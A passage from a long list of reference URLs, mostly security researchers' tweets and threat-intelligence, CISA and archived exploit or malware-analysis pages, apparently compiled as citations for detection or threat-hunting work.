m/_felamos/status/1204705548668555264\nhttps://twitter.com/_JohnHammond/status/1531672601067675648\nhttps://twitter.com/_JohnHammond/status/1588155401752788994\nhttps://twitter.com/_JohnHammond/status/1708910264261980634\nhttps://twitter.com/_nullbind/status/1204923340810543109\nhttps://twitter.com/_st0pp3r_/status/1560072680887525378\nhttps://twitter.com/_st0pp3r_/status/1583914244344799235\nhttps://twitter.com/_st0pp3r_/status/1583914515996897281\nhttps://twitter.com/_st0pp3r_/status/1583922009842802689\nhttps://twitter.com/_vivami/status/1347925307643355138\nhttps://twitter.com/_xpn_/status/1268712093928378368\nhttps://twitter.com/_xpn_/status/1491557187168178176\nhttps://twitter.com/aboul3la/status/1286012324722155525\nhttps://twitter.com/aceresponder/status/1636116096506818562\nhttps://twitter.com/AdamTheAnalyst/status/1134394070045003776\nhttps://twitter.com/AdamTheAnalyst/status/1483497517119590403\nhttps://twitter.com/Al1ex4/status/1382981479727128580\nhttps://twitter.com/Alh4zr3d/status/15
66489367232651264\nhttps://twitter.com/Alh4zr3d/status/1580925761996828672\nhttps://twitter.com/am0nsec/status/1412232114980982787\nhttps://twitter.com/an0n_r0/status/1474698356635193346?s=12\nhttps://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A\nhttps://twitter.com/anfam17/status/1607477672057208835\nhttps://twitter.com/ankit_anubhav/status/1518835408502620162\nhttps://twitter.com/ber_m1ng/status/1397948048135778309\nhttps://twitter.com/bh4b3sh/status/1303674603819081728\nhttps://twitter.com/bigmacjpg/status/1349727699863011328?s=12\nhttps://twitter.com/bl4sty/status/1445462677824761878\nhttps://twitter.com/blackarrowsec/status/1463805700602224645?s=12\nhttps://twitter.com/blackorbird/status/1140519090961825792\nhttps://twitter.com/BleepinComputer/status/1372218235949617161\nhttps://twitter.com/bohops/status/1276357235954909188?s=12\nhttps://twitter.com/bohops/status/1477717351017680899?s=12\nhttps://twitter.com/bohops/status/1583916360404729857\nhttps://twitter.com/bohops/status/1635288066909966338\nhttps://twitter.com/bohops/status/1740022869198037480\nhttps://twitter.com/bohops/status/948061991012327424\nhttps://twitter.com/bohops/status/980659399495741441\nhttps://twitter.com/bohops/status/994405551751815170\nhttps://twitter.com/bopin2020/status/1366400799199272960\nhttps://twitter.com/breakersall/status/1533493587828260866\nhttps://twitter.com/bryon_/status/975835709587075072\nhttps://twitter.com/Carlos_Perez/status/883455096645931008\nhttps://twitter.com/cglyer/status/1182389676876980224\nhttps://twitter.com/cglyer/status/1182391019633029120\nhttps://twitter.com/cglyer/status/1183756892952248325\nhttps://twitter.com/cglyer/status/1355171195654709249\nhttps://twitter.com/chadtilbury/status/1275851297770610688\nhttps://twitter.com/christophetd/status/1164506034720952320\nhttps://twitter.com/ClearskySec/status/960924755355369472\nhttps://twitter.com/countuponsec/status/910969424215232518\nhttps://twitter.com/countuponsec/s
tatus/910977826853068800\nhttps://twitter.com/craiu/status/1167358457344925696\nhttps://twitter.com/crep1x/status/1635034100213112833\nhttps://twitter.com/Cryptolaemus1/status/1517634855940632576\nhttps://twitter.com/cube0x0/status/1418920190759378944\nhttps://twitter.com/cyb3rops/status/1063072865992523776\nhttps://twitter.com/cyb3rops/status/1096842275437625346\nhttps://twitter.com/cyb3rops/status/1168863899531132929\nhttps://twitter.com/cyb3rops/status/1186631731543236608\nhttps://twitter.com/cyb3rops/status/1460978167628406785\nhttps://twitter.com/cyb3rops/status/1514217991034097664\nhttps://twitter.com/cyb3rops/status/1552932770464292864\nhttps://twitter.com/cyb3rops/status/1562072617552678912\nhttps://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA\nhttps://twitter.com/cyb3rops/status/1617108657166061568?s=20\nhttps://twitter.com/cyb3rops/status/1659175181695287297\nhttps://twitter.com/cyb3rops/status/972186477512839170\nhttps://twitter.com/Cyb3rWard0g/status/1381642789369286662\nhttps://twitter.com/Cyb3rWard0g/status/1453123054243024897\nhttps://twitter.com/CyberRaiju/status/1251492025678983169\nhttps://twitter.com/CyberRaiju/status/1273597319322058752\nhttps://twitter.com/cyberwar_15/status/1187287262054076416\nhttps://twitter.com/d1r4c/status/1279042657508081664\nhttps://twitter.com/D1rkMtr/status/1611471891193298944?s=20\nhttps://twitter.com/d4rksystem/status/1357010969264873472\nhttps://twitter.com/davisrichardg/status/1616518800584704028\nhttps://twitter.com/deviouspolack/status/832535435960209408\nhttps://twitter.com/dez_/status/1560101453150257154\nhttps://twitter.com/dez_/status/986614411711442944\nhttps://twitter.com/DidierStevens/status/1217533958096924676\nhttps://twitter.com/DissectMalware/status/1062879286749773824\nhttps://twitter.com/DissectMalware/status/998797808907046913\nhttps://twitter.com/dottor_morte/status/1544652325570191361\nhttps://twitter.com/DrunkBinary/status/1063075530180886529\nhttps://twitter.com/D
TCERT/status/1712785421845790799\nhttps://twitter.com/DTCERT/status/1712785426895839339\nhttps://twitter.com/duff22b/status/1280166329660497920\nhttps://twitter.com/duzvik/status/1269671601852813320\nhttps://twitter.com/egre55/status/1087685529016193025\nhttps://twitter.com/elliotkillick/status/1449812843772227588\nhttps://twitter.com/EmericNasi/status/1623224526220804098\nhttps://twitter.com/eral4m/status/1451112385041911809\nhttps://twitter.com/eral4m/status/1479080793003671557\nhttps://twitter.com/eral4m/status/1479106975967240209\nhttps://twitter.com/eral4m/status/1480468728324231172?s=20\nhttps://twitter.com/EricaZelic/status/1614075109827874817\nhttps://twitter.com/felixw3000/status/853354851128025088\nhttps://twitter.com/ffforward/status/1481672378639912960\nhttps://twitter.com/filip_dragovic/status/1590052248260055041\nhttps://twitter.com/filip_dragovic/status/1590104354727436290\nhttps://twitter.com/Flangvik/status/1283054508084473861\nhttps://twitter.com/FlemmingRiis/status/1217147415482060800\nhttps://twitter.com/ForensicITGuy/status/1334734244120309760\nhttps://twitter.com/forensicitguy/status/1513538712986079238\nhttps://twitter.com/fr0s7_/status/1712780207105404948\nhttps://twitter.com/frack113/status/1555830623633375232\nhttps://twitter.com/fuzzyf10w/status/1410202370835898371\nhttps://twitter.com/GadixCRK/status/1369313704869834753?s=20\nhttps://twitter.com/Gal_B1t/status/1062971006078345217\nhttps://twitter.com/gbti_sa/status/1249653895900602375?lang=en\nhttps://twitter.com/GelosSnake/status/934900723426439170\nhttps://twitter.com/gentilkiwi/status/1003236624925413376\nhttps://twitter.com/gentilkiwi/status/861641945944391680\nhttps://twitter.com/gN3mes1s/status/1206874118282448897\nhttps://twitter.com/gN3mes1s/status/1222088214581825540\nhttps://twitter.com/gN3mes1s/status/1222095371175911424\nhttps://twitter.com/gN3mes1s/status/1222095963789111296\nhttps://twitter.com/gN3mes1s/status/941315826107510784\nhttps://twitter.com/GossiTheDog/status/139296
5209132871683?s=20\nhttps://twitter.com/GossiTheDog/status/1429175908905127938\nhttps://twitter.com/h4x0r_dz/status/1445401960371429381\nhttps://twitter.com/hackerfantastic/status/1616455335203438592?s=20\nhttps://twitter.com/hakluke/status/1587733971814977537/photo/1\nhttps://twitter.com/harr0ey/status/989617817849876488\nhttps://twitter.com/harr0ey/status/991670870384021504\nhttps://twitter.com/harr0ey/status/992008180904419328\nhttps://twitter.com/Hexacorn/status/1224848930795552769\nhttps://twitter.com/Hexacorn/status/1420053502554951689\nhttps://twitter.com/hexacorn/status/1448037865435320323\nhttps://twitter.com/Hexacorn/status/776122138063409152\nhttps://twitter.com/Hexacorn/status/885258886428725250\nhttps://twitter.com/Hexacorn/status/885553465417756673\nhttps://twitter.com/Hexacorn/status/885570278637678592\nhttps://twitter.com/Hexacorn/status/991447379864932352\nhttps://twitter.com/hFireF0X/status/897640081053364225\nhttps://twitter.com/httpvoid0x2f/status/1532924261035384832\nhttps://twitter.com/HunterPlaybook/status/1301207718355759107\nhttps://twitter.com/INIT_3/status/1410662463641731075\nhttps://twitter.com/inversecos/status/1494174785621819397\nhttps://twitter.com/ItsReallyNick/status/1094080242686312448\nhttps://twitter.com/j00sean/status/1537750439701225472\nhttps://twitter.com/j0nh4t/status/1429049506021138437\nhttps://twitter.com/jackcr/status/807385668833968128\nhttps://twitter.com/JAMESWT_MHT/status/1699042827261391247\nhttps://twitter.com/jamieantisocial/status/1304520651248668673\nhttps://twitter.com/jas502n/status/1321416053050667009?s=20\nhttps://twitter.com/jhencinski/status/1102695118455349248\nhttps://twitter.com/JohnLaTwC/status/1004895028995477505\nhttps://twitter.com/JohnLaTwC/status/1082851155481288706\nhttps://twitter.com/JohnLaTwC/status/1223292479270600706\nhttps://twitter.com/johnlatwc/status/1408062131321270282?s=12\nhttps://twitter.com/JohnLaTwC/status/1415295021041979392\nhttps://twitter.com/JohnLaTwC/status/83514980881799168
0\nhttps://twitter.com/JohnLaTwC/status/837743453039534080\nhttps://twitter.com/JohnLaTwC/status/850381440629981184\nhttps://twitter.com/jonasLyk/status/1347900440000811010\nhttps://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19\nhttps://twitter.com/jonasLyk/status/1555914501802921984\nhttps://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nhttps://twitter.com/jseerden/status/1247985304667066373/photo/1\nhttps://twitter.com/kagancapar/status/1515219358234161153\nhttps://twitter.com/kevin_backhouse/status/1666459308941357056?s=20\nhttps://twitter.com/KevTheHermit/status/1410203844064301056\nhttps://twitter.com/killamjr/status/1179034907932315648\nhttps://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q\nhttps://twitter.com/kleiton0x7e/status/1600567316810551296\nhttps://twitter.com/kmkz_security/status/1220694202301976576\nhttps://twitter.com/Kostastsale/status/1565257924204986369\nhttps://twitter.com/Kostastsale/status/1646256901506605063?s=20\nhttps://twitter.com/Kostastsale/status/1700965142828290260\nhttps://twitter.com/lefterispan/status/1286259016436514816\nhttps://twitter.com/luc4m/status/1073181154126254080\nhttps://twitter.com/m417z/status/1566674631788007425\nhttps://twitter.com/M_haggis/status/1032799638213066752\nhttps://twitter.com/M_haggis/status/1699056847154725107\nhttps://twitter.com/M_haggis/status/900741347035889665\nhttps://twitter.com/MaD_c4t/status/1623414582382567424\nhttps://twitter.com/malmoeb/status/1511760068743766026\nhttps://twitter.com/malmoeb/status/1525901219247845376\nhttps://twitter.com/malmoeb/status/1535142803075960832\nhttps://twitter.com/malmoeb/status/1550483085472432128\nhttps://twitter.com/malmoeb/status/1560536653709598721\nhttps://twitter.com/malmoeb/status/1570814999370801158\nhttps://twitter.com/malmoeb/status/1616702107242971144\nhttps://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w\nhttps://twitter.com/MalwareJake/statu
s/1410421967463731200\nhttps://twitter.com/MalwareJake/status/870349480356454401\nhttps://twitter.com/malwrhunterteam/status/1235135745611960321\nhttps://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2\nhttps://twitter.com/mariuszbit/status/1531631015139102720\nhttps://twitter.com/matthewdunwoody/status/1352356685982146562\nhttps://twitter.com/matthieugarin/status/1183970598210412546\nhttps://twitter.com/mattifestation/status/1196390321783025666\nhttps://twitter.com/mattifestation/status/1326228491302563846\nhttps://twitter.com/mattifestation/status/899646620148539397\nhttps://twitter.com/mattifestation/status/986280382042595328\nhttps://twitter.com/max_mal_/status/1542461200797163522\nhttps://twitter.com/Max_Mal_/status/1633863678909874176\nhttps://twitter.com/Max_Mal_/status/1661322732456353792\nhttps://twitter.com/Max_Mal_/status/1775222576639291859\nhttps://twitter.com/med0x2e/status/1520402518685200384\nhttps://twitter.com/menasec1/status/1104489274387451904\nhttps://twitter.com/menasec1/status/1106899890377052160\nhttps://twitter.com/menasec1/status/1111556090137903104\nhttps://twitter.com/mgreen27/status/1558223256704122882\nhttps://twitter.com/MichalKoczwara/status/1553634816016498688\nhttps://twitter.com/momika233/status/1626464189261942786\nhttps://twitter.com/Moriarty_Meng/status/984380793383370752\nhttps://twitter.com/Moti_B/status/1008587936735035392\nhttps://twitter.com/Moti_B/status/909449115477659651\nhttps://twitter.com/mpgn_x64/status/1216787131210829826\nhttps://twitter.com/mrd0x/status/1460597833917251595\nhttps://twitter.com/mrd0x/status/1460815932402679809\nhttps://twitter.com/mrd0x/status/1461041276514623491\nhttps://twitter.com/mrd0x/status/1463526834918854661\nhttps://twitter.com/mrd0x/status/1465058133303246867\nhttps://twitter.com/mrd0x/status/1475085452784844803?s=12\nhttps://twitter.com/mrd0x/status/1478116126005641220\nhttps://twitter.com/mrd0x/status/1478234484881436672?s=12\nhttps://twitter.com/mrd0x/status/147909418904
8713219\nhttps://twitter.com/mrd0x/status/1480785527901204481\nhttps://twitter.com/mrd0x/status/1481630810495139841?s=12\nhttps://twitter.com/mrd0x/status/1511415432888131586\nhttps://twitter.com/mrd0x/status/1511489821247684615\nhttps://twitter.com/MsftSecIntel/status/1257324139515269121\nhttps://twitter.com/MsftSecIntel/status/1737895710169628824\nhttps://twitter.com/mttaggart/status/1511804863293784064\nhttps://twitter.com/mvelazco/status/1410291741241102338\nhttps://twitter.com/n1nj4sec/status/1421190238081277959\nhttps://twitter.com/nao_sec/status/1530196847679401984\nhttps://twitter.com/nas_bench/status/1433344116071583746\nhttps://twitter.com/nas_bench/status/1534915321856917506\nhttps://twitter.com/nas_bench/status/1534916659676422152\nhttps://twitter.com/nas_bench/status/1534957360032120833\nhttps://twitter.com/nas_bench/status/1535322182863179776\nhttps://twitter.com/nas_bench/status/1535322445439180803\nhttps://twitter.com/nas_bench/status/1535322450858233858\nhttps://twitter.com/nas_bench/status/1535431474429808642\nhttps://twitter.com/nas_bench/status/1535663791362519040\nhttps://twitter.com/nas_bench/status/1535981653239255040\nhttps://twitter.com/nas_bench/status/1537563834478645252\nhttps://twitter.com/nas_bench/status/1537896324837781506\nhttps://twitter.com/nas_bench/status/1537919885031772161\nhttps://twitter.com/nas_bench/status/1539679555908141061\nhttps://twitter.com/nas_bench/status/1550836225652686848\nhttps://twitter.com/nas_bench/status/1618021415852335105\nhttps://twitter.com/nas_bench/status/1618021838407495681\nhttps://twitter.com/nas_bench/status/1626648985824788480\nhttps://twitter.com/NathanMcNulty/status/1569497348841287681\nhttps://twitter.com/NathanMcNulty/status/1785051227568632263\nhttps://twitter.com/neonprimetime/status/1435584010202255375\nhttps://twitter.com/neonprimetime/status/1436376497980428318\nhttps://twitter.com/neu5ron/status/1346245602502443009\nhttps://twitter.com/neu5ron/status/1438987292971053057?s=20\nhttps://twi
tter.com/NinjaParanoid/status/1516442028963659777\nhttps://twitter.com/notwhickey/status/1333900137232523264\nhttps://twitter.com/Oddvarmoe/status/1270633613449723905\nhttps://twitter.com/Oddvarmoe/status/1641712700605513729\nhttps://twitter.com/Oddvarmoe/status/985518877076541440\nhttps://twitter.com/Oddvarmoe/status/993383596244258816\nhttps://twitter.com/orange_8361/status/1518970259868626944\nhttps://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw\nhttps://twitter.com/ORCA6665/status/1496478087244095491\nhttps://twitter.com/oroneequalsone/status/1568432028361830402\nhttps://twitter.com/OTR_Community/status/1371053369071132675\nhttps://twitter.com/oulusoyum/status/1191329746069655553\nhttps://twitter.com/pabraeken/status/990717080805789697\nhttps://twitter.com/pabraeken/status/990758590020452353\nhttps://twitter.com/pabraeken/status/991335019833708544\nhttps://twitter.com/pabraeken/status/993298228840992768\nhttps://twitter.com/pabraeken/status/993497996179492864\nhttps://twitter.com/pabraeken/status/995837734379032576\nhttps://twitter.com/pabraeken/status/998627081360695297\nhttps://twitter.com/pabraeken/status/999090532839313408\nhttps://twitter.com/parzel2/status/1665726454489915395\nhttps://twitter.com/pfiatde/status/1681977680688738305\nhttps://twitter.com/PhilipTsukerman/status/992021361106268161\nhttps://twitter.com/ptswarm/status/1445376079548624899\nhttps://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw\nhttps://twitter.com/Purp1eW0lf/status/1616144561965002752\nhttps://twitter.com/pyn3rd/status/1020620932967223296\nhttps://twitter.com/pyn3rd/status/1351696768065409026\nhttps://twitter.com/PythonResponder/status/1385064506049630211\nhttps://twitter.com/pythonresponder/status/1385064506049630211?s=21\nhttps://twitter.com/r00tbsd/status/1679042071477338114/photo/1\nhttps://twitter.com/rbmaslen/status/1321859647091970051\nhttps://twitter.com/ReaQta/status/1222548288731217921\nhttps://twitter.
com/RedDrip7/status/1506480588827467785\nhttps://twitter.com/ReneFreingruber/status/1172244989335810049\nhttps://twitter.com/rikvduijn/status/853251879320662017\nhttps://twitter.com/RonnyTNL/status/1436334640617373699?s=20\nhttps://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03\nhttps://twitter.com/Sam0x90/status/1552011547974696960\nhttps://twitter.com/sblmsrsn/status/1445758411803480072?s=20\nhttps://twitter.com/sblmsrsn/status/1456613494783160325?s=20\nhttps://twitter.com/SBousseaden/status/1090588499517079552\nhttps://twitter.com/SBousseaden/status/1096148422984384514\nhttps://twitter.com/SBousseaden/status/1101431884540710913\nhttps://twitter.com/SBousseaden/status/1139811587760562176\nhttps://twitter.com/SBousseaden/status/1167417096374050817\nhttps://twitter.com/SBousseaden/status/1183745981189427200\nhttps://twitter.com/SBousseaden/status/1184067445612535811\nhttps://twitter.com/SBousseaden/status/1189469425482829824\nhttps://twitter.com/SBousseaden/status/1195284233729777665\nhttps://twitter.com/SBousseaden/status/1207671369963646976\nhttps://twitter.com/SBousseaden/status/1211636381086339073\nhttps://twitter.com/SBousseaden/status/1278977301745741825\nhttps://twitter.com/sbousseaden/status/1282441816986484737?s=12\nhttps://twitter.com/SBousseaden/status/1387530414185664538\nhttps://twitter.com/SBousseaden/status/1387743867663958021\nhttps://twitter.com/SBousseaden/status/1410545674773467140\nhttps://twitter.com/sbousseaden/status/1429401053229891590?s=12\nhttps://twitter.com/SBousseaden/status/1429530155291193354?s=20\nhttps://twitter.com/SBousseaden/status/1451237393017839616\nhttps://twitter.com/SBousseaden/status/1464566846594691073?s=20\nhttps://twitter.com/SBousseaden/status/1483810148602814466\nhttps://twitter.com/SBousseaden/status/1490608838701166596\nhttps://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g\nhttps://twitter.com/sbousseaden/status/1523383197513379841\nhttps://twitter.com
/sbousseaden/status/1531653369546301440\nhttps://twitter.com/SBousseaden/status/1541920424635912196\nhttps://twitter.com/sbousseaden/status/1555200155351228419\nhttps://twitter.com/SBousseaden/status/1581300963650187264?\nhttps://twitter.com/ScumBots/status/1610626724257046529\nhttps://twitter.com/sec715/status/1373472323538362371\nhttps://twitter.com/SecurePeacock/status/1486054048390332423?s=20\nhttps://twitter.com/SecurityJosh/status/1283027365770276866\nhttps://twitter.com/ShadowChasing1/status/1552595370961944576\nhttps://twitter.com/shantanukhande/status/1229348874298388484\nhttps://twitter.com/shutingrz/status/1469255861394866177?s=21\nhttps://twitter.com/splinter_code/status/1420546784250769408\nhttps://twitter.com/splinter_code/status/1483815103279603714\nhttps://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g\nhttps://twitter.com/standa_t/status/1808868985678803222\nhttps://twitter.com/StopMalvertisin/status/1648604148848549888\nhttps://twitter.com/stvemillertime/status/1024707932447854592\nhttps://twitter.com/subTee/status/1216465628946563073\nhttps://twitter.com/subTee/status/891298217907830785\nhttps://twitter.com/sudo_sudoka/status/1323951871078223874\nhttps://twitter.com/SwiftOnSecurity/status/1455897435063074824\nhttps://twitter.com/swisscom_csirt/status/1331634525722521602?s=20\nhttps://twitter.com/t3ft3lb/status/1656194831830401024\nhttps://twitter.com/tccontre18/status/1480950986650832903\nhttps://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg\nhttps://twitter.com/th3_protoCOL/status/1480621526764322817\nhttps://twitter.com/TheDFIRReport/status/1423361119926816776?s=20\nhttps://twitter.com/TheDFIRReport/status/1482078434327244805\nhttps://twitter.com/tifkin_/status/1321916444557365248\nhttps://twitter.com/timbmsft/status/900724491076214784\nhttps://twitter.com/VakninHai/status/1517027824984547329\nhttps://twitter.com/vanitasnk/status/1437329511142420483?s=21\nhttps://twitter.com/V
K_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19\nhttps://twitter.com/VM_vivisector/status/1217190929330655232\nhttps://twitter.com/vxunderground/status/1423336151860002816\nhttps://twitter.com/vxunderground/status/1423336151860002816?s=20\nhttps://twitter.com/vysecurity/status/873181705024266241\nhttps://twitter.com/vysecurity/status/885545634958385153\nhttps://twitter.com/vysecurity/status/974806438316072960\nhttps://twitter.com/vysecurity/status/977198418354491392\nhttps://twitter.com/wdormann/status/1347958161609809921\nhttps://twitter.com/wdormann/status/1478011052130459653?s=20\nhttps://twitter.com/wdormann/status/1486161836961579020\nhttps://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw\nhttps://twitter.com/wdormann/status/1547583317410607110\nhttps://twitter.com/wdormann/status/1590434950335320065\nhttps://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09\nhttps://twitter.com/wdormann/status/1679184475677130755\nhttps://twitter.com/WhichbufferArda/status/1543900539280293889\nhttps://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2\nhttps://twitter.com/WhichbufferArda/status/1658829954182774784\nhttps://twitter.com/Wietze/status/1542107456507203586\nhttps://twitter.com/WindowsDocs/status/1620078135080325122\nhttps://twitter.com/wugeej/status/1369476795255320580\nhttps://twitter.com/x86matthew/status/1505476263464607744?s=12\nhttps://twitter.com/xorJosh/status/1598646907802451969\nhttps://twitter.com/Yasser_Elsnbary/status/1553804135354564608\nhttps://twitter.com/yorickkoster/status/1279709009151434754\nhttps://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20\nhttps://twitter.com/Z3Jpa29z/status/1317545798981324801\nhttps://unicode-explorer.com/c/202E\nhttps://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\nhttps://unit42.paloaltonetworks.com/bluesky-ransomware/\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\nhtt
ps://unit42.paloaltonetworks.com/cloaked-ursa-phishing/\nhttps://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nhttps://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/\nhttps://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\nhttps://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/\nhttps://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\nhttps://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\nhttps://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/\nhttps://unit42.paloaltonetworks.com/ransomware-families/\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\nhttps://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/\nhttps://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/\nhttps://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\nhttps://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\nhttps://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/\nhttps://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true\nhttps://us-cert.cisa.gov/ncas/alerts/aa21-008a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a\nhtt
ps://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png\nhttps://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html\nhttps://vanmieghem.io/stealth-outlook-persistence/\nhttps://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx\nhttps://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/\nhttps://vk9-sec.com/hfs-code-execution-cve-2014-6287/\nhttps://vms.drweb.fr/virus/?i=24144899\nhttps://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224\nhttps://vulncheck.com/blog/real-world-cve-2023-43261\nhttps://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf\nhttps://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/\nhttps://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e\nhttps://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/\nhttps://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html\nhttps://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html\nhttps://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html\nhttps://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\nhttps://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nhttps://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nhttps://web.archive.org/web/20180718061628/https://securitybytes.io
/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\nhttps://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\nhttps://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html\nhttps://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/\nhttps://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf\nhttps://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708\nhttps://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nhttps://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\nhttps://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\nhttps://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf\nhttps://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf\nhttps://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\nhttps://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf\nhttps://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf\nhttps://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation\nhttps://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-loggin
g/\nhttps://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua\nhttps://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf\nhttps://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866\nhttps://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html\nhttps://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html\nhttps://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap\nhttps://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/\nhttps://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu\nhttps://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1\nhttps://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\nhttps://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\nhttps://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934\nhttps://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html\nhttps://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/k